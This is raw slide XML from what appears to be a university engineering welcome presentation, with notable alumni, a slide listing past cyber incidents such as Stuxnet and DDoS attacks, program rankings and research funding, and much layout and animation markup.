              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2057" name="Picture 9" descr="Ursula Bur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9999" y="3667852"/>
            <a:ext cx="1679575" cy="22324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762374" y="5849488"/>
            <a:ext cx="1803400" cy="560153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Ursula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Burns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Mech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> Eng.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2059" name="Picture 11" descr="Ginni Romett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27098" y="3680552"/>
            <a:ext cx="1545036" cy="206004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097916" y="5713735"/>
            <a:ext cx="1803400" cy="510909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Ginni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Rometty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CSEE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF99CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2061" name="Picture 13" descr="Joanne M. Maguire, Executive Vice President, Space System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5836" y="1536700"/>
            <a:ext cx="1905000" cy="238125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456636" y="2866399"/>
            <a:ext cx="1803400" cy="1286506"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Joanne M. Maguire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>EE/MSU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Lockhed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> Martin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Space System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62584419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0025"/>
            <a:ext cx="8382000" cy="978729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cyber security is pervasive, ubiquitous, necessary, serious, fun, and profitable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368300" y="1204913"/>
            <a:ext cx="8410575" cy="4875181"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Phishing emails compromise CU 300 accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> attacks on White House/FTC/DC 7/4/08</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash Drive Virus shutdown </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> networks 11/08</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> virus targeted MS computers controlling Iranian uranium enrichment centrifuge, 7/10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Russian hackers disrupted 9/08 CNN interview of Georgia President </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Saakashvili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, banks, internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SI ad hires &gt;100 Information Security persons.</a:t>
            </a:r>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Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</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3256" y="5092696"/>
            <a:ext cx="1941690" cy="109220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4455" y="5092695"/>
            <a:ext cx="1753899" cy="1092201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2139357" y="5903280"/>
            <a:ext cx="1753899" cy="563231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Siemens </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S7-300 PLC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF99CC"/>
              </a:solidFill>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495" y="4983146"/>
            <a:ext cx="1508760" cy="1508760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356925" y="5998205"/>
            <a:ext cx="1753899" cy="563231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Designed 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Worm 1988</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>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69605" y="5750613"/>
            <a:ext cx="788987" cy="525035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48413536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Everything is Possible</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374370" y="866962"/>
            <a:ext cx="6832599" cy="4182683"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>EAS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>ranked the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>seventh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>in the nation among public engineering schools offering bachelor’s or master’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>degrees in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>U.S. News &amp; World Report</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> "America’s Best </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Colleges.“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Faculty engages in state of art</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>ederal funded research </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>projects with funding from NSF, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>DoD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> (ONR/AFOSR/Army), DoE, NIH.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Faculty involves undergraduate students in their research with NSF and College  Research for Undergraduate (REU) support.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>“I love UCCS’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="08F81F"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>small classes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>– my  professors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>know me by name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>and I can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>approach them any time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>I have question.” – Holly Peterson, EE students</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Long list of successful alumni.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>EAS Programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>UCCS/EAS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="http://www.usnews.com/pubdbimages/image/19001/GR_PR_bestcollegesbadge2011_78x7878x7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1695" y="5601324"/>
            <a:ext cx="1062037" cy="1062038"/>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1631" y="1650999"/>
            <a:ext cx="132485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descr="Portable Video Surveillance Came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91500" y="1184273"/>
            <a:ext cx="952500" cy="133826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1834" y="2522536"/>
            <a:ext cx="2128624" cy="117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rfid tag inlay.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="16666"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1212479">
            <a:off x="7327105" y="5269756"/>
            <a:ext cx="158432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9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7206455" y="4952256"/>
            <a:ext cx="1622425" cy="647700"/>
            <a:chOff x="6169670" y="3946158"/>
            <a:chExt cx="1908161" cy="793770"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1232155">
              <a:off x="6169670" y="3946158"/>
              <a:ext cx="1908161" cy="793770"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="90000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="dk1"/>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:schemeClr val="lt1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="dk1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="dk1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Picture 6" descr="tag-ALN-9540%20Squiggle.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279171">
              <a:off x="6187405" y="4229593"/>
              <a:ext cx="1878724" cy="250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Picture 3" descr="Symetrix2.JPG"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="47137" t="78889" r="10440" b="2222"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1252400">
            <a:off x="7055643" y="3794969"/>
            <a:ext cx="17113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rot="1133367">
            <a:off x="7119143" y="5180856"/>
            <a:ext cx="830262" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>Gen2 inlay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1141014">
            <a:off x="7473155" y="5825381"/>
            <a:ext cx="957263" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>FeRAM inlay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7"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4499" y="4580468"/>
            <a:ext cx="1390135" cy="164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2353" y="6049843"/>
            <a:ext cx="1114425" cy="611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C:\Users\chow\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\OCFMTJB4\gailhamilton.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34634" y="4580468"/>
            <a:ext cx="1416566" cy="197573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61879" y="6132343"/>
            <a:ext cx="13620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06763" y="4595848"/>
            <a:ext cx="2936886" cy="2160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30530" y="3889027"/>
            <a:ext cx="1538825" cy="116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56068" y="5952381"/>
            <a:ext cx="14382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57844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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>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ox(in)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="4" presetClass="entr" presetSubtype="16"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ox(in)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="4"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ox(in)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="4"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ox(in)">
                                      <p:cBhvr>
                                        <p:cTn id="2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Building Solid Fundamentals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
